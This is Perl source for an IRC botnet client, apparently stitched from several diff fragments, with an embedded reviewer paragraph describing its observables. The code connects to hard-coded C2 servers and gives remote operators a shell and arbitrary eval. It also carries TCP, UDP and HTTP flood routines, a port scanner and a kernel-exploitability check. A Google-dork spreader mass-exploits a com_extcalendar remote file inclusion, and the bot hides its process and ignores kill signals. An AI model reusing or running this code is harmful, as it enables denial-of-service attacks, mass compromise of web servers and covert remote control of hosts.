if ($kern =~ /2.4.17\s/ || $kern =~ /2.4.18\s/ || $kern =~ /2.4.19\s/ || $kern =~ /2.4.20/ || $kern =~ /2.4.20-8/ || $kern =~ /2.4.21\s/ || $kern =~ /2.4.22\s/ || $kern =~ /2.4.22-10\s/ || $kern =~ /2.4.23\s/ || $kern =~ /2.4.24\s/ || $kern =~ /2.4.25-1\s/ || $kern =~ /2.4.26\s/ || $kern =~ /2.4.27\s/ || $kern =~ /2.6.2\s/ || $kern =~ /2.6.5\s/ || $kern =~ /2.6.6\s/ || $kern =~ /2.6.7\s/ || $kern =~ /2.6.8\s/ || $kern =~ /2.6.8-5\s/ || $kern =~ /2.6.9\s/ || $kern =~ /2.6.9-34\s/ || $kern =~ /2.6.10\s/ || $kern =~ /2.6.11/ || $kern =~ /2.6.13\s/ || $kern =~ /2.6.13-17/ || $kern =~ /2.6.14\s/ || $kern =~ /2.6.15\s/ || $kern =~ /2.6.16\s/)
{
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034[Exploitable Kernel !!]\003\002 Im exploitable Kernel: ".`uname -r`);
}
else
{
return 1;
}
return 0;
}
sub shell {
return unless $acessoshell;
my $printl=$_[0];
my $comando=$_[1];
if ($comando =~ /cd (.*)/) {
chdir("$1") || msg("$printl", "Diretório inexistente!");
return;
}
elsif ($pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
if ($c >= "$linas_max") {
$c=0;
sleep $sleep;
}
}
exit;
}
}
}
#eu fiz um pacotadorzinhu e talz.. dai colokemo ele aki
sub attacker {
my $iaddr = inet_aton($_[0]);
my $msg = 'B' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $porta = 1; $porta <= 65535; $porta++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++ if ($pacotes == 1);
send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++ if ($pacotes == 1);
send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++ if ($pacotes == 1);
send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++ if ($pacotes == 1);
# DoS ?? :P
for (my $pc = 3; $pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++ if ($pacotes == 1);
}
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}
#############
# ALIASES #
#############
sub action {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001ACTION $_[1]\001");
}
sub ctcp {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :$_[1]");
}
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
return unless $#_ == 1;
sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
return unless $#_ == 1;
sendraw("MODE $_[0] -o $_[1]");
}
sub hop {
return unless $#_ == 1;
sendraw("MODE $_[0] +h $_[1]");
}
sub dehop {
return unless $#_ == 1;
sendraw("MODE $_[0] +h $_[1]");
}
sub voice {
return unless $#_ == 1;
sendraw("MODE $_[0] +v $_[1]");
}
sub devoice {
return unless $#_ == 1;
sendraw("MODE $_[0] -v $_[1]");
}
sub ban {
return unless $#_ == 1;
sendraw("MODE $_[0] +b $_[1]");
}
sub unban {
return unless $#_ == 1;
sendraw("MODE $_[0] -b $_[1]");
}
sub kick {
return unless $#_ == 1;
sendraw("KICK $_[0] $_[1] :$_[2]");
}
sub modo {
return unless $#_ == 0;
sendraw("MODE $_[0] $_[1]");
}
sub mode { modo(@_); }
sub j { &join(@_); }
sub join {
return unless $#_ == 0;
sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {sendraw("PART $_[0]");}
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub invite {
return unless $#_ == 1;
sendraw("INVITE $_[1] $_[0]");
}
sub topico {
return unless $#_ == 1;
sendraw("TOPIC $_[0] $_[1]");
}
sub topic { topico(@_); }
sub whois {
return unless $#_ == 0;
sendraw("WHOIS $_[0]");
}
sub who {
return unless $#_ == 0;
sendraw("WHO $_[0]");
}
sub names {
return unless $#_ == 0;
sendraw("NAMES $_[0]");
}
sub away {
sendraw("AWAY $_[0]");
}
sub back { away(); }
sub quit {
sendraw("QUIT :$_[0]");
exit;
}
# DCC
package DCC;
sub connections {
my @ready = $dcc_sel->can_read(1);
# return unless (@ready);
foreach my $fh (@ready) {
my $dcctipo = $DCC{$fh}{tipo};
my $arquivo = $DCC{$fh}{arquivo};
my $bytes = $DCC{$fh}{bytes};
my $cur_byte = $DCC{$fh}{curbyte};
my $nick = $DCC{$fh}{nick};
my $msg;
my $nread = sysread($fh, $msg, 10240);
if ($nread == 0 and $dcctipo =~ /^(get|sendcon)$/) {
$DCC{$fh}{status} = "Cancelado";
$DCC{$fh}{ftime} = time;
$dcc_sel->remove($fh);
$fh->close;
next;
}
if ($dcctipo eq "get") {
$DCC{$fh}{curbyte} += length($msg);
my $cur_byte = $DCC{$fh}{curbyte};
open(FILE, ">> $arquivo");
print FILE "$msg" if ($cur_byte <= $bytes);
close(FILE);
my $packbyte = pack("N", $cur_byte);
print $fh "$packbyte";
if ($bytes == $cur_byte) {
$dcc_sel->remove($fh);
$fh->close;
$DCC{$fh}{status} = "Recebido";
$DCC{$fh}{ftime} = time;
next;
}
} elsif ($dcctipo eq "send") {
my $send = $fh->accept;
$send->autoflush(1);
$dcc_sel->add($send);
$dcc_sel->remove($fh);
$DCC{$send}{tipo} = 'sendcon';
$DCC{$send}{itime} = time;
$DCC{$send}{nick} = $nick;
$DCC{$send}{bytes} = $bytes;
$DCC{$send}{curbyte} = 0;
$DCC{$send}{arquivo} = $arquivo;
$DCC{$send}{ip} = $send->peerhost;
$DCC{$send}{porta} = $send->peerport;
$DCC{$send}{status} = "Enviando";
#de cara manda os primeiro 1024 bytes do arkivo.. o resto fik com o sendcon
open(FILE, "< $arquivo");
my $fbytes;
read(FILE, $fbytes, 1024);
print $send "$fbytes";
close FILE;
# delete($DCC{$fh});
} elsif ($dcctipo eq 'sendcon') {
my $bytes_sended = unpack("N", $msg);
$DCC{$fh}{curbyte} = $bytes_sended;
if ($bytes_sended == $bytes) {
$fh->close;
$dcc_sel->remove($fh);
$DCC{$fh}{status} = "Enviado";
$DCC{$fh}{ftime} = time;
next;
}
open(SENDFILE, "< $arquivo");
seek(SENDFILE, $bytes_sended, 0);
my $send_bytes;
read(SENDFILE, $send_bytes, 1024);
print $fh "$send_bytes";
close(SENDFILE);
}
}
}
sub SEND {
my ($nick, $arquivo) = @_;
unless (-r "$arquivo") {
return(0);
}
my $dccark = $arquivo;
$dccark =~ s/[.*\/](\S+)/$1/;
my $meuip = $::irc_servers{"$::IRC_cur_socket"}{'meuip'};
my $longip = unpack("N",inet_aton($meuip));
my @filestat = stat($arquivo);
my $size_total=$filestat[7];
if ($size_total == 0) {
return(0);
}
my ($porta, $sendsock);
do {
$porta = int rand(64511);
$porta += 1024;
$sendsock = IO::Socket::INET->new(Listen=>1, LocalPort =>$porta, Proto => 'tcp') and $dcc_sel->add($sendsock);
} until $sendsock;
$DCC{$sendsock}{tipo} = 'send';
$DCC{$sendsock}{nick} = $nick;
$DCC{$sendsock}{bytes} = $size_total;
$DCC{$sendsock}{arquivo} = $arquivo;
&::ctcp("$nick", "DCC SEND $dccark $longip $porta $size_total");
}
sub GET {
my ($arquivo, $dcclongip, $dccporta, $bytes, $nick) = @_;
return(0) if (-e "$arquivo");
if (open(FILE, "> $arquivo")) {
close FILE;
} else {
return(0);
}
my $dccip=fixaddr($dcclongip);
return(0) if ($dccporta < 1024 or not defined $dccip or $bytes < 1);
my $dccsock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$dccip, PeerPort=>$dccporta, Timeout=>15) or return (0);
$dccsock->autoflush(1);
$dcc_sel->add($dccsock);
$DCC{$dccsock}{tipo} = 'get';
$DCC{$dccsock}{itime} = time;
$DCC{$dccsock}{nick} = $nick;
$DCC{$dccsock}{bytes} = $bytes;
$DCC{$dccsock}{curbyte} = 0;
$DCC{$dccsock}{arquivo} = $arquivo;
$DCC{$dccsock}{ip} = $dccip;
$DCC{$dccsock}{porta} = $dccporta;
$DCC{$dccsock}{status} = "Recebendo";
}
# po fico xato de organiza o status.. dai fiz ele retorna o status de acordo com o socket.. dai o ADM.pl lista os sockets e faz as perguntas
sub Status {
my $socket = shift;
my $sock_tipo = $DCC{$socket}{tipo};
unless (lc($sock_tipo) eq "chat") {
my $nick = $DCC{$socket}{nick};
my $arquivo = $DCC{$socket}{arquivo};
my $itime = $DCC{$socket}{itime};
my $ftime = time;
my $status = $DCC{$socket}{status};
$ftime = $DCC{$socket}{ftime} if defined($DCC{$socket}{ftime});
my $d_time = $ftime-$itime;
my $cur_byte = $DCC{$socket}{curbyte};
my $bytes_total = $DCC{$socket}{bytes};
my $rate = 0;
$rate = ($cur_byte/1024)/$d_time if $cur_byte > 0;
my $porcen = ($cur_byte*100)/$bytes_total;
my ($r_duv, $p_duv);
if ($rate =~ /^(\d+)\.(\d)(\d)(\d)/) {
$r_duv = $3; $r_duv++ if $4 >= 5;
$rate = "$1\.$2"."$r_duv";
}
if ($porcen =~ /^(\d+)\.(\d)(\d)(\d)/) {
$p_duv = $3; $p_duv++ if $4 >= 5;
$porcen = "$1\.$2"."$p_duv";
}
return("$sock_tipo","$status","$nick","$arquivo","$bytes_total", "$cur_byte","$d_time", "$rate", "$porcen");
}
return(0);
}
# esse 'sub fixaddr' daki foi pego do NET::IRC::DCC identico soh copiei e coloei (colokar nome do autor)
sub fixaddr {
my ($address) = @_;
chomp $address; # just in case, sigh.
if ($address =~ /^\d+$/) {
return inet_ntoa(pack "N", $address);
} elsif ($address =~ /^[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}$/) {
return $address;
} elsif ($address =~ tr/a-zA-Z//) { # Whee! Obfuscation!
return inet_ntoa(((gethostbyname($address))[4])[0]);
} else {
return;
}
}


@ -0,0 +1,515 @@
# Thanks To apaii, KingFighter, fdf, Kill_Tech And gr33t t0 Myhack & HackerMalaysia @DALnet
# ------[eoff = End Of Fucking Files]-----
system("kill -9 `ps ax |grep /var/tmp/wops/is |grep -v grep|awk '{print $1;}'`");
my $processo = 'httpsl';
# Bermula Disini
my @titi = ("afrika-");
my $sleep='5';
my $linas_max='4';
my @adms=("xx","ok","mos", "Boss_xx", "KKTeam", "KaHiN");
my @hostauth=("fbi.gov");
my @canais=("#mambo");
my $nick= $titi[rand scalar @titi];
my $ircname = $titi[rand scalar @titi];
chop (my $realname = $titi[rand scalar @titi]);
$servidor='xx.albap0wer.com' unless $servidor;
my $porta='8555';
my $versi_saya = '1.0';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}
sub conectar {
my $meunick = $_[0];
my $servidor_con = $_[1];
my $porta_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
$irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
nick("$meunick");
sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
sleep 1;
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
my @ready = $sel_cliente->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$meunick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_cliente->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $msg);
for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSION\001$/) {
notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001");
}
if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
if ($onde eq "$meunick"){
shell("$pn", "$args");
}
if ($args =~ /^(\Q$meunick\E|\!say)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
if ($arg =~ /^\!(.*)/) {
ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
} elsif ($arg =~ /^\@(.*)/) {
$ondep = $onde;
$ondep = $pn if $onde eq $meunick;
bfunc("$ondep","$1");
} else {
shell("$onde", "$arg");
}
}
}
}
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($meunick)) {
$meunick=$4;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
}
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$meunick|".int rand(999999));
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$meunick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
foreach my $canal (@canais) {
sendraw("JOIN $canal ddosit");
}
}
}
sub bfunc {
my $printl = $_[0];
my $funcarg = $_[1];
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my @portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
my (@aberta, %porta_banner);
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Scanning ".$1." for open ports.");
foreach my $porta (@portas) {
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
if ($scansock) {
push (@aberta, $porta);
$scansock->close;
}
}
if (@aberta) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Open port(s): @aberta");
} else {
sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[SCAN]\002 No open ports found");
}
}
if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attacking ".$1.":".$2." for ".$3." seconds.");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($3>$cur_time){
$cur_time = time - $itime;
&tcpflooder("$1","$2","$3");
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attack done ".$1.":".$2.".");
}
if ($funcarg =~ /^version/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[VERSION]\002 HackerMalaysia Versi ".$versi_saya);
}
if ($funcarg =~ /^google\s+(\d+)\s+(.*)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Scanning for Php-Nuk3 exploit ".$1." seconds.");
srand;
my $itime = time;
my ($cur_time);
my ($exploited);
$boturl=$2;
$cur_time = time - $itime;$exploited = 0;
while($1>$cur_time){
$cur_time = time - $itime;
@urls=fetch();
foreach $url (@urls) {
$cur_time = time - $itime;
my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;
$url =$path."components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=$boturl?";
$page = http_query($url);
$exploited = $exploited + 1;
}
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Exploited ".$exploited." Php-Nuk3 boxes in ".$1." seconds.");
}
if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking ".$1.":80 for ".$2." seconds.");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
close($socket);
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking done ".$1.".");
}
if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Attacking ".$1." with ".$2." Kb packets for ".$3." seconds.");
my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Sent ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." Kb in ".$dtime." seconds to ".$1.".");
}
exit;
}
}
}
sub ircase {
my ($kem, $printl, $case) = @_;
if ($case =~ /^join (.*)/) {
j("$1");
}
if ($case =~ /^part (.*)/) {
p("$1");
}
if ($case =~ /^rejoin\s+(.*)/) {
my $chan = $1;
if ($chan =~ /^(\d+) (.*)/) {
for (my $ca = 1; $ca <= $1; $ca++ ) {
p("$2");
j("$2");
}
} else {
p("$chan");
j("$chan");
}
}
if ($case =~ /^op/) {
op("$printl", "$kem") if $case eq "op";
my $oarg = substr($case, 3);
op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^deop/) {
deop("$printl", "$kem") if $case eq "deop";
my $oarg = substr($case, 5);
deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^msg\s+(\S+) (.*)/) {
msg("$1", "$2");
}
if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
msg("$2", "$3");
}
}
if ($case =~ /^ctcp\s+(\S+) (.*)/) {
ctcp("$1", "$2");
}
if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
ctcp("$2", "$3");
}
}
if ($case =~ /^nick (.*)/) {
nick("$1");
}
if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
conectar("$2", "$1", 6667);
}
if ($case =~ /^raw (.*)/) {
sendraw("$1");
}
if ($case =~ /^eval (.*)/) {
eval "$1";
}
}
sub shell {
my $printl=$_[0];
my $comando=$_[1];
if ($comando =~ /cd (.*)/) {
chdir("$1") || msg("$printl", "No such file or directory");
return;
}
elsif ($pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
if ($c == "$linas_max") {
$c=0;
sleep $sleep;
}
}
exit;
}
}
}
sub tcpflooder {
my $itime = time;
my ($cur_time);
my ($ia,$pa,$proto,$j,$l,$t);
$ia=inet_aton($_[0]);
$pa=sockaddr_in($_[1],$ia);
$ftime=$_[2];
$proto=getprotobyname('tcp');
$j=0;$l=0;
$cur_time = time - $itime;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
socket($t,PF_INET,SOCK_STREAM,$proto);
connect($t,$pa)||$j--;
$j++;$l++;
}
$l=0;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
shutdown($t,2);
$l++;
}
}
sub udpflooder {
my $iaddr = inet_aton($_[0]);
my $msg = 'A' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $porta = 1; $porta <= 65000; $porta++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
for (my $pc = 3; $pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
}
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}
sub ctcp {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :$_[1]");
}
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
return unless $#_ == 1;
sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
return unless $#_ == 1;
sendraw("MODE $_[0] -o $_[1]");
}
sub j { &join(@_); }
sub join {
return unless $#_ == 0;
sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {
sendraw("PART $_[0]");
}
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub quit {
sendraw("QUIT :$_[0]");
}
# Spreader
# this 'spreader' code isnot mine, i dont know who coded it.
# update: well, i just fix0red this shit a bit.
#
sub fetch(){
my $rnd=(int(rand(9999)));
my $n= 80;
if ($rnd<5000) { $n<<=1;}
my $s= (int(rand(10)) * $n);
my @dominios = ("com","net","org","info","gov", "gob","gub","xxx", "eu","mil","edu","aero","name","us","ca","mx","pa","ni","cu","pr","ve","co","pe","ec",
"py","cl","uy","ar","br","bo","au","nz","cz","kr","jp","th","tw","ph","cn","fi","de","es","pt","ch","se","su","it","gr","al","dk","pl","biz","int","pro","museum","coop",
"af","ad","ao","ai","aq","ag","an","sa","dz","ar","am","aw","at","az","bs","bh","bd","bb","be","bz","bj","bm","bt","by","ba","bw","bn","bg","bf","bi",
"vc","kh","cm","td","cs","cy","km","cg","cd","dj","dm","ci","cr","hr","kp","eg","sv","aw","er","sk",
"ee","et","ge","fi","fr","ga","gs","gh","gi","gb","uk","gd","gl","gp","gu","gt","gg","gn","gw","gq","gy","gf","ht","nl","hn","hk","hu","in","id","ir",
"iq","ie","is","ac","bv","cx","im","nf","ky","cc","ck","fo","hm","fk","mp","mh","pw","um","sb","sj","tc","vg","vi","wf","il","jm","je","jo","kz","ke",
"ki","kg","kw","lv","ls","lb","ly","lr","li","lt","lu","mo","mk","mg","my","mw","mv","ml","mt","mq","ma","mr","mu","yt","md","mc","mn","ms","mz","mm",
"na","nr","np","ni","ne","ng","nu","no","nc","om","pk","ps","pg","pn","pf","qa","sy","cf","la","re","rw","ro","ru","eh","kn","ws","as","sm","pm","vc",
"sh","lc","va","st","sn","sc","sl","sg","so","lk","za","sd","se","sr","sz","rj","tz","io","tf","tp","tg","to","tt","tn","tr","tm","tv","ug","ua","uz",
"vu","vn","ye","yu","cd","zm","zw","");
my @str;
foreach $dom (@dominios)
{
push (@str,"%22com_extcalendar%22+inurl%3Aindex.php?option=com_extcalendar+site%3A&".$dom."%20");
}
my $query="www.google.co.uk/search?q=";
$query.=$str[(rand(scalar(@str)))];
$query.="hl=en&lr=&start=$&sa=N";
my @lst=();
my $page = http_query($query);
while ($page =~ m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){
if ($1 !~ m/google|cache|translate/){
push (@lst,$1);
}
}
return (@lst);
}
sub http_query($){
my ($url) = @_;
my $host=$url;
my $query=$url;
my $page="";
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~s/$host//;
if ($query eq "") {$query="/";};
eval {
local $SIG{ALRM} = sub { die "1";};
alarm 10;
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
alarm 0;
close($sock);
};
return $page;
}
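Review bot: The file carries no analysis header, and the behaviour an analyst needs is scattered through the preamble: the `system("kill -9 ...")` call at the top kills a previous copy by matching `/var/tmp/wops/is` in `ps` output, `$0="$processo"."\0"x16;` renames the process to `httpsl`, INT/HUP/TERM/CHLD are set to IGNORE, and the bot daemonizes with `fork` before connecting to the hard-coded `$servidor`/`$porta` and joining `@canais`. A top-of-file comment recording those observables (process name, the `/var/tmp/wops/is` path, the C2 host, port and channel) would make the sample classifiable without reading the whole body. The same comment should note that `ircase` dispatches `raw` and `eval` subcommands (`eval "$1";`), so a sender passing the `@hostauth`/`@adms` match can run arbitrary Perl inside the bot process — that capability, not the flood routines, is what should drive the severity rating.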


@ -0,0 +1,515 @@
# Thanks To apaii, KingFighter, fdf, Kill_Tech And gr33t t0 Myhack & HackerMalaysia @DALnet
# ------[eoff = End Of Fucking Files]-----
system("kill -9 `ps ax |grep /var/tmp/wops/is |grep -v grep|awk '{print $1;}'`");
my $processo = 'httpsl';
# Bermula Disini
my @titi = ("PhpNuke-|");
my $sleep='5';
my $linas_max='4';
my @adms=("xx","mos","fuckyou");
my @hostauth=("fbi.gov");
my @canais=("#phpnuke1");
my $nick= $titi[rand scalar @titi];
my $ircname = $titi[rand scalar @titi];
chop (my $realname = $titi[rand scalar @titi]);
$servidor='mushu.tetovalive.de' unless $servidor;
my $porta='8209';
my $versi_saya = '1.0';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}
sub conectar {
my $meunick = $_[0];
my $servidor_con = $_[1];
my $porta_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
$irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
